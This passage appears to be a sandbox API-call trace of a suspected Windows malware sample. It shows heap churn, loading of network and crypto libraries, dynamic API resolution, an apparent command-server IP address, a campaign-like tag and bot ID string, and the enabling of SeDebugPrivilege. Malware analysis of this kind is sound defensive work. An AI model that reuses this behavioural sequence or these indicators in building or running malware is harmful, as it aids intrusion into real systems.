hHeap=0x560000, dwFlags=0x0, lpMem=0x625250 | out: hHeap=0x560000) returned 1 [0186.462] GetProcessHeap () returned 0x560000 [0186.462] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x624730 | out: hHeap=0x560000) returned 1 [0186.462] GetProcessHeap () returned 0x560000 [0186.462] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x623cd0 | out: hHeap=0x560000) returned 1 [0186.462] GetProcessHeap () returned 0x560000 [0186.462] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x623290 | out: hHeap=0x560000) returned 1 [0186.462] GetProcessHeap () returned 0x560000 [0186.462] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6228f0 | out: hHeap=0x560000) returned 1 [0186.462] GetProcessHeap () returned 0x560000 [0186.462] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x622300 | out: hHeap=0x560000) returned 1 [0186.462] GetProcessHeap () returned 0x560000 [0186.462] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x621a10 | out: hHeap=0x560000) returned 1 [0186.462] GetProcessHeap () returned 0x560000 [0186.462] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x621150 | out: hHeap=0x560000) returned 1 [0186.462] GetProcessHeap () returned 0x560000 [0186.462] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x620950 | out: hHeap=0x560000) returned 1 [0186.462] GetProcessHeap () returned 0x560000 [0186.462] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6204a0 | out: hHeap=0x560000) returned 1 [0186.462] GetProcessHeap () returned 0x560000 [0186.462] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x620040 | out: hHeap=0x560000) returned 1 [0186.462] GetProcessHeap () returned 0x560000 [0186.462] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x611980 | out: hHeap=0x560000) returned 1 [0186.462] GetProcessHeap () returned 0x560000 [0186.463] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x611590 | out: hHeap=0x560000) returned 1 [0186.463] GetProcessHeap () returned 0x560000 [0186.463] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6111e0 | out: hHeap=0x560000) returned 1 [0186.463] GetProcessHeap () returned 0x560000 [0186.463] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610e30 | out: hHeap=0x560000) returned 1 [0186.463] GetProcessHeap () returned 0x560000 [0186.463] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610ac0 | out: hHeap=0x560000) returned 1 [0186.463] GetProcessHeap () returned 0x560000 [0186.463] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6107e0 | out: hHeap=0x560000) returned 1 [0186.463] GetProcessHeap () returned 0x560000 [0186.463] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610530 | out: hHeap=0x560000) returned 1 [0186.463] GetProcessHeap () returned 0x560000 [0186.463] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x60f390 | out: hHeap=0x560000) returned 1 [0186.463] GetProcessHeap () returned 0x560000 [0186.463] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x60f050 | out: hHeap=0x560000) returned 1 [0186.463] GetProcessHeap () returned 0x560000 [0186.463] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x60eea0 | out: hHeap=0x560000) returned 1 [0186.463] GetProcessHeap () returned 0x560000 [0186.463] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x60ecf0 | out: hHeap=0x560000) returned 1 [0186.463] GetProcessHeap () returned 0x560000 [0186.463] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x60ea70 | out: hHeap=0x560000) returned 1 [0186.463] GetProcessHeap () returned 0x560000 [0186.463] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x61b040 | out: hHeap=0x560000) returned 1 [0186.463] GetProcessHeap () returned 0x560000 [0186.463] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x60e930 | out: hHeap=0x560000) returned 1 [0186.463] GetProcessHeap () returned 0x560000 [0186.463] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x60e880 | out: hHeap=0x560000) returned 1 [0186.466] GetProcessHeap () returned 0x560000 [0186.466] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x60e800 | out: hHeap=0x560000) returned 1 [0186.466] GetProcessHeap () returned 0x560000 [0186.466] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x60e5d0 | out: hHeap=0x560000) returned 1 [0186.466] GetProcessHeap () returned 0x560000 [0186.466] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x616cd0 | out: hHeap=0x560000) returned 1 [0186.466] GetProcessHeap () returned 0x560000 [0186.466] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6173e0 | out: hHeap=0x560000) returned 1 [0186.466] GetProcessHeap () returned 0x560000 [0186.466] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6159a0 | out: hHeap=0x560000) returned 1 [0186.466] GetProcessHeap () returned 0x560000 [0186.466] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617280 | out: hHeap=0x560000) returned 1 [0186.466] GetProcessHeap () returned 0x560000 [0186.466] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x616990 | out: hHeap=0x560000) returned 1 [0186.466] GetProcessHeap () returned 0x560000 [0186.466] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x61d7d0 | out: hHeap=0x560000) returned 1 [0186.466] GetProcessHeap () returned 0x560000 [0186.466] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6173b0 | out: hHeap=0x560000) returned 1 [0186.467] GetProcessHeap () returned 0x560000 [0186.467] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617360 | out: hHeap=0x560000) returned 1 [0186.467] GetProcessHeap () returned 0x560000 [0186.467] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x616b90 | out: hHeap=0x560000) returned 1 [0186.467] GetProcessHeap () returned 0x560000 [0186.467] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615c00 | out: hHeap=0x560000) returned 1 [0186.467] GetProcessHeap () returned 0x560000 [0186.467] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x616b50 | out: hHeap=0x560000) returned 1 [0186.467] GetProcessHeap () returned 0x560000 [0186.467] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6159c0 | out: hHeap=0x560000) returned 1 [0186.467] GetProcessHeap () returned 0x560000 [0186.467] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x61d320 | out: hHeap=0x560000) returned 1 [0186.467] GetProcessHeap () returned 0x560000 [0186.467] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615980 | out: hHeap=0x560000) returned 1 [0186.467] GetProcessHeap () returned 0x560000 [0186.467] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6173f0 | out: hHeap=0x560000) returned 1 [0186.467] GetProcessHeap () returned 0x560000 [0186.467] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615900 | out: hHeap=0x560000) returned 1 [0186.467] GetProcessHeap () returned 0x560000 [0186.467] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x616b10 | out: hHeap=0x560000) returned 1 [0186.467] GetProcessHeap () returned 0x560000 [0186.467] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6173d0 | out: hHeap=0x560000) returned 1 [0186.467] GetProcessHeap () returned 0x560000 [0186.467] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6134d0 | out: hHeap=0x560000) returned 1 [0186.467] GetProcessHeap () returned 0x560000 [0186.467] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x619b30 | out: hHeap=0x560000) returned 1 [0186.467] GetProcessHeap () returned 0x560000 [0186.467] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x616bd0 | out: hHeap=0x560000) returned 1 [0186.467] GetProcessHeap () returned 0x560000 [0186.467] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615be0 | out: hHeap=0x560000) returned 1 [0186.467] GetProcessHeap () returned 0x560000 [0186.467] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6172e0 | out: hHeap=0x560000) returned 1 [0186.467] GetProcessHeap () returned 0x560000 [0186.467] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x616c90 | out: hHeap=0x560000) returned 1 [0186.467] GetProcessHeap () returned 0x560000 [0186.467] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x616e90 | out: hHeap=0x560000) returned 1 [0186.467] GetProcessHeap () returned 0x560000 [0186.467] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617350 | out: hHeap=0x560000) returned 1 [0186.467] GetProcessHeap () returned 0x560000 [0186.467] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x616d50 | out: hHeap=0x560000) returned 1 [0186.468] GetProcessHeap () returned 0x560000 [0186.468] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617380 | out: hHeap=0x560000) returned 1 [0186.468] GetProcessHeap () returned 0x560000 [0186.468] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613080 | out: hHeap=0x560000) returned 1 [0186.468] GetProcessHeap () returned 0x560000 [0186.468] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6173a0 | out: hHeap=0x560000) returned 1 [0186.468] GetProcessHeap () returned 0x560000 [0186.468] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617470 | out: hHeap=0x560000) returned 1 [0186.468] GetProcessHeap () returned 0x560000 [0186.468] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615c20 | out: hHeap=0x560000) returned 1 [0186.468] GetProcessHeap () returned 0x560000 [0186.468] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615940 | out: hHeap=0x560000) returned 1 [0186.468] GetProcessHeap () returned 0x560000 [0186.468] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0186.468] GetProcessHeap () returned 0x560000 [0186.468] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617200 | out: hHeap=0x560000) returned 1 [0186.468] GetProcessHeap () returned 0x560000 [0186.468] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0186.468] GetProcessHeap () returned 0x560000 [0186.468] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617190 | out: hHeap=0x560000) returned 1 [0186.468] GetProcessHeap () returned 0x560000 [0186.468] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0186.468] GetProcessHeap () returned 0x560000 [0186.468] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171d0 | out: hHeap=0x560000) returned 1 [0186.468] GetProcessHeap () returned 0x560000 [0186.468] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615ac0 | out: hHeap=0x560000) returned 1 [0186.468] GetProcessHeap () returned 0x560000 [0186.468] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171a0 | out: hHeap=0x560000) returned 1 [0186.468] GetProcessHeap () returned 0x560000 [0186.468] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617270 | out: hHeap=0x560000) returned 1 [0186.468] GetProcessHeap () returned 0x560000 [0186.468] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613410 | out: hHeap=0x560000) returned 1 [0186.468] GetProcessHeap () returned 0x560000 [0186.468] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615a00 | out: hHeap=0x560000) returned 1 [0186.468] GetProcessHeap () returned 0x560000 [0186.468] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615ba0 | out: hHeap=0x560000) returned 1 [0186.468] GetProcessHeap () returned 0x560000 [0186.469] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615c40 | out: hHeap=0x560000) returned 1 [0186.469] GetProcessHeap () returned 0x560000 [0186.469] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0186.469] GetProcessHeap () returned 0x560000 [0186.469] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617260 | out: hHeap=0x560000) returned 1 [0186.469] GetProcessHeap () returned 0x560000 [0186.469] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171f0 | out: hHeap=0x560000) returned 1 [0186.469] GetProcessHeap () returned 0x560000 [0186.469] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x614aa0 | out: hHeap=0x560000) returned 1 [0186.469] GetProcessHeap () returned 0x560000 [0186.469] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x619170 | out: hHeap=0x560000) returned 1 [0186.469] GetProcessHeap () returned 0x560000 [0186.469] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.469] GetProcessHeap () returned 0x560000 [0186.469] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0186.469] GetProcessHeap () returned 0x560000 [0186.469] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617110 | out: hHeap=0x560000) returned 1 [0186.469] GetProcessHeap () returned 0x560000 [0186.469] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x616ad0 | out: hHeap=0x560000) returned 1 [0186.469] GetProcessHeap () returned 0x560000 [0186.469] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.469] GetProcessHeap () returned 0x560000 [0186.469] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0186.469] GetProcessHeap () returned 0x560000 [0186.469] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x616a90 | out: hHeap=0x560000) returned 1 [0186.469] GetProcessHeap () returned 0x560000 [0186.469] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x614a50 | out: hHeap=0x560000) returned 1 [0186.469] GetProcessHeap () returned 0x560000 [0186.469] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6170c0 | out: hHeap=0x560000) returned 1 [0186.469] GetProcessHeap () returned 0x560000 [0186.469] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613620 | out: hHeap=0x560000) returned 1 [0186.469] GetProcessHeap () returned 0x560000 [0186.469] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615b80 | out: hHeap=0x560000) returned 1 [0186.469] GetProcessHeap () returned 0x560000 [0186.469] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6170b0 | out: hHeap=0x560000) returned 1 [0186.469] GetProcessHeap () returned 0x560000 [0186.469] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6133e0 | out: hHeap=0x560000) returned 1 [0186.469] GetProcessHeap () returned 0x560000 [0186.469] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613110 | out: hHeap=0x560000) returned 1 [0186.469] GetProcessHeap () returned 0x560000 [0186.469] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615bc0 | out: hHeap=0x560000) returned 1 [0186.470] GetProcessHeap () returned 0x560000 [0186.470] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.470] GetProcessHeap () returned 0x560000 [0186.470] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x614cd0 | out: hHeap=0x560000) returned 1 [0186.470] GetProcessHeap () returned 0x560000 [0186.470] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6190b0 | out: hHeap=0x560000) returned 1 [0186.470] GetProcessHeap () returned 0x560000 [0186.470] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615340 | out: hHeap=0x560000) returned 1 [0186.470] GetProcessHeap () returned 0x560000 [0186.470] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613470 | out: hHeap=0x560000) returned 1 [0186.470] GetProcessHeap () returned 0x560000 [0186.470] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6170e0 | out: hHeap=0x560000) returned 1 [0186.470] GetProcessHeap () returned 0x560000 [0186.470] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6170f0 | out: hHeap=0x560000) returned 1 [0186.470] GetProcessHeap () returned 0x560000 [0186.470] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6170a0 | out: hHeap=0x560000) returned 1 [0186.470] GetProcessHeap () returned 0x560000 [0186.470] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0186.470] GetProcessHeap () returned 0x560000 [0186.470] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617120 | out: hHeap=0x560000) returned 1 [0186.470] GetProcessHeap () returned 0x560000 [0186.470] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617170 | out: hHeap=0x560000) returned 1 [0186.470] GetProcessHeap () returned 0x560000 [0186.470] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617080 | out: hHeap=0x560000) returned 1 [0186.470] GetProcessHeap () returned 0x560000 [0186.470] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6170d0 | out: hHeap=0x560000) returned 1 [0186.470] GetProcessHeap () returned 0x560000 [0186.470] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x614eb0 | out: hHeap=0x560000) returned 1 [0186.470] GetProcessHeap () returned 0x560000 [0186.470] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x616dd0 | out: hHeap=0x560000) returned 1 [0186.470] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x614c80 | out: hHeap=0x560000) returned 1 [0186.470] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x560000) returned 1 [0186.470] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x614fa0 | out: hHeap=0x560000) returned 1 [0186.470] GetProcessHeap () returned 0x560000 [0186.470] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x6171f0 [0186.471] GetProcessHeap () returned 0x560000 [0186.471] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x41) returned 0x614c80 [0186.471] GetProcessHeap () returned 0x560000 [0186.471] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x6170b0 [0186.471] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffb28a50000 [0186.471] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffb281e0000 [0186.474] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffb26090000 [0186.474] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffb19d70000 [0186.474] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x7ffb174f0000 [0186.487] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffb253c0000 [0186.487] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffb267e0000 [0186.487] LoadLibraryA (lpLibFileName="userenv.dll") returned 0x7ffb24880000 [0186.487] LoadLibraryA (lpLibFileName="Oleaut32.dll") returned 0x7ffb288f0000 [0186.487] ResetEvent (hEvent=0x8) returned 1 [0186.487] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0186.545] GetProcessHeap () returned 0x560000 [0186.545] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xf) returned 0x6170c0 [0186.545] GetProcessHeap () returned 0x560000 [0186.545] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617250 [0186.545] GetProcessHeap () returned 0x560000 [0186.545] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.545] GetProcessHeap () returned 0x560000 [0186.545] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6170c0 | out: hHeap=0x560000) returned 1 [0186.545] RtlAddVectoredExceptionHandler (FirstHandler=0x0, VectoredHandler=0x1800096ec) returned 0x615340 [0186.545] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffb26230000 [0186.545] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0186.545] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryW") returned 0x7ffb262550f0 [0186.545] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryA") returned 0x7ffb262574d0 [0186.546] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FreeLibrary") returned 0x7ffb26254810 [0186.546] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x20) returned 0x615be0 [0186.546] GetProcessHeap () returned 0x560000 [0186.546] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617260 [0186.546] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0186.546] GetProcessHeap () returned 0x560000 [0186.546] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617260 | out: hHeap=0x560000) returned 1 [0186.546] Sleep (dwMilliseconds=0xa) [0186.556] GetProcessHeap () returned 0x560000 [0186.556] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x617200 [0186.556] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrlenA") returned 0x7ffb26250c60 [0186.557] GetProcessHeap () returned 0x560000 [0186.557] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617200 | out: hHeap=0x560000) returned 1 [0186.557] lstrlenA (lpString="88.153.199.169") returned 14 [0186.557] GetProcessHeap () returned 0x560000 [0186.557] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x617170 [0186.557] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrlenA") returned 0x7ffb26250c60 [0186.557] GetProcessHeap () returned 0x560000 [0186.557] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617170 | out: hHeap=0x560000) returned 1 [0186.557] lstrlenA (lpString="88.153.199.169") returned 14 [0186.557] GetProcessHeap () returned 0x560000 [0186.557] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x617250 [0186.557] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrlenA") returned 0x7ffb26250c60 [0186.557] GetProcessHeap () returned 0x560000 [0186.557] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.557] lstrlenA (lpString="tot153") returned 6 [0186.557] GetProcessHeap () returned 0x560000 [0186.557] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x617110 [0186.557] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrlenA") returned 0x7ffb26250c60 [0186.557] GetProcessHeap () returned 0x560000 [0186.557] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617110 | out: hHeap=0x560000) returned 1 [0186.557] lstrlenA (lpString="tot153") returned 6 [0186.557] GetProcessHeap () returned 0x560000 [0186.557] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x617260 [0186.557] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrlenA") returned 0x7ffb26250c60 [0186.557] GetProcessHeap () returned 0x560000 [0186.557] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617260 | out: hHeap=0x560000) returned 1 [0186.558] lstrlenA (lpString="XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93") returned 49 [0186.558] GetProcessHeap () returned 0x560000 [0186.558] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x617180 [0186.558] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrlenA") returned 0x7ffb26250c60 [0186.558] GetProcessHeap () returned 0x560000 [0186.558] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0186.558] lstrlenA (lpString="XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93") returned 49 [0186.558] GetProcessHeap () returned 0x560000 [0186.558] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x6170f0 [0186.558] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0186.558] GetProcessHeap () returned 0x560000 [0186.558] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6170f0 | out: hHeap=0x560000) returned 1 [0186.558] Sleep (dwMilliseconds=0xa) [0186.573] GetProcessHeap () returned 0x560000 [0186.573] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x12) returned 0x615900 [0186.573] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetCurrentProcess") returned 0x7ffb2624b7c0 [0186.573] GetProcessHeap () returned 0x560000 [0186.573] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615900 | out: hHeap=0x560000) returned 1 [0186.573] GetCurrentProcess () returned 0xffffffffffffffff [0186.573] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="OpenProcessToken") returned 0x7ffb28a67180 [0186.573] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0xcfde0 | out: TokenHandle=0xcfde0*=0x1ac) returned 1 [0186.573] GetProcessHeap () returned 0x560000 [0186.573] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x11) returned 0x615c00 [0186.573] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="LookupPrivilegeValueA") returned 0x7ffb28a809e0 [0186.573] LookupPrivilegeValueA (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xcfde8 | out: lpLuid=0xcfde8*(LowPart=0x14, HighPart=0)) returned 1 [0186.581] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="AdjustTokenPrivileges") returned 0x7ffb28a67340 [0186.581] AdjustTokenPrivileges (in: TokenHandle=0x1ac, DisableAllPrivileges=0, NewState=0xcfd98*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0186.581] GetProcessHeap () returned 0x560000 [0186.581] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617250 [0186.581] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CloseHandle") returned 0x7ffb2625d650 [0186.581] GetProcessHeap () returned 0x560000 [0186.581] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.581] CloseHandle (hObject=0x1ac) returned 1 [0186.581] GetProcessHeap () returned 0x560000 [0186.581] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615c00 | out: hHeap=0x560000) returned 1 [0186.582] GetProcessHeap () returned 0x560000 [0186.582] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1a) returned 0x615900 [0186.582] GetProcAddress (hModule=0x7ffb26230000, lpProcName="InitializeCriticalSection") returned 0x7ffb28b6ced0 [0186.582] GetProcessHeap () returned 0x560000 [0186.582] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615900 | out: hHeap=0x560000) returned 1 [0186.582] GetProcessHeap () returned 0x560000 [0186.582] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x12) returned 0x615c00 [0186.582] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetCurrentProcess") returned 0x7ffb2624b7c0 [0186.582] GetProcessHeap () returned 0x560000 [0186.582] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615c00 | out: hHeap=0x560000) returned 1 [0186.582] GetCurrentProcess () returned 0xffffffffffffffff [0186.582] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="OpenProcessToken") returned 0x7ffb28a67180 [0186.582] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0xcfdf0 | out: TokenHandle=0xcfdf0*=0x1ac) returned 1 [0186.582] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="GetTokenInformation") returned 0x7ffb28a66610 [0186.582] GetTokenInformation (in: TokenHandle=0x1ac, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcfde8 | out: TokenInformation=0x0, ReturnLength=0xcfde8) returned 0 [0186.582] GetLastError () returned 0x7a [0186.582] 